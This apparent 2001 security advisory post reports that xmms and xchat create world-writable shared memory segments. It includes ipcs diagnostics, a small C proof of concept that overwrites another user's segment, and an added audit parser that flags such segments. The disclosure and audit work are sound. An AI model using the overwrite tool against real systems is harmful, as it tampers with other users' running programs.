From: Julien VANEGUE (vanegu_jepita.fr)
Date: Sat Nov 03 2001 - 04:22:23 CST


    On Slackware 8:

    bash-2.05$ ipcs -m

    ------ Shared Memory Segments --------
    key shmid owner perms bytes nattch status
    0x00000000 4216960 mayhem 777 196608 2 dest
    0x00000000 7636737 mayhem 777 196608 2 dest

    bash-2.05$ ipcs -p -m

    ------ Shared Memory Creator/Last-op --------
    shmid owner cpid lpid
    4216960 mayhem 3921 1406
    7636737 mayhem 26206 26209

    bash-2.05$ cat /proc/3921/cmdline ; echo
    /opt/gnome/bin/xmms
    bash-2.05$ cat /proc/26206/cmdline ; echo
    /opt/gnome/bin/xchat
    bash-2.05$

    Seems not to be exploitable (no fault) but still needs to be fixed.

    /*
    ** test_shm.c
    **
    ** Made by Julien Vanegue
    ** Login <mayhemhert.org>
    */
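    #include <sys/types.h>
    #include <sys/ipc.h>
    #include <sys/shm.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>   /* memset */
    #include <unistd.h>   /* sleep */

    #define FATAL(str) { perror(str); exit(-1); }

    void usage()
    {
      fprintf(stderr, "syntax: a.out shmid size \n");
      exit(-1);
    }

    int main(int argc, char **argv)
    {
      char *addr;

      if (argc != 3)
        usage();
      /* Attach the segment named by shmid; perms 777 let any local user do so. */
      if ((addr = shmat(atoi(argv[1]), 0, 0)) == (void *) -1)
        FATAL("shmat");
      /* Overwrite the first <size> bytes of the attached segment. */
      memset(addr, 'A', atoi(argv[2]));
      sleep(2);
      return 0;
    }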
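
An audit-side counterpart to the `ipcs -m` listing in the message above, added here as an example and not part of the original post: it parses `ipcs -m` text and reports the segments whose mode grants write access to other users. The function name `world_writable_shm` and the 600 sample line are constructed for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Segment lines from the `ipcs -m` listing in the message above, plus one
 * constructed 600 line (shmid 99) to show a segment that is not flagged. */
static const char SAMPLE_IPCS[] =
    "------ Shared Memory Segments --------\n"
    "key shmid owner perms bytes nattch status\n"
    "0x00000000 4216960 mayhem 777 196608 2 dest\n"
    "0x00000000 7636737 mayhem 777 196608 2 dest\n"
    "0x00000000 99 mayhem 600 4096 1\n";

/* Scan `ipcs -m` text and store the shmid of every segment whose mode has
 * the "other write" bit (octal 002) set. Returns how many were stored. */
int world_writable_shm(const char *text, long *out, int max)
{
    int found = 0;
    const char *line = text;

    while (*line != '\0') {
        size_t len = strcspn(line, "\n");
        char buf[256];
        char key[32], owner[64];
        long shmid;
        unsigned int perms;

        if (len < sizeof(buf)) {
            memcpy(buf, line, len);
            buf[len] = '\0';
            /* Header and separator lines fail to match and are skipped. */
            if (sscanf(buf, "%31s %ld %63s %o", key, &shmid, owner, &perms) == 4
                && strncmp(key, "0x", 2) == 0
                && (perms & 0002) && found < max)
                out[found++] = shmid;
        }
        line += len;
        if (*line == '\n')
            line++;
    }
    return found;
}

int main(void)
{
    long ids[16];
    int n = world_writable_shm(SAMPLE_IPCS, ids, 16);

    for (int i = 0; i < n; i++)
        printf("shmid %ld is world-writable\n", ids[i]);
    return n > 0;   /* non-zero exit status when anything was flagged */
}
```

Each flagged shmid can then be mapped to its creator with `ipcs -p -m` and `/proc/<cpid>/cmdline`, as the message does.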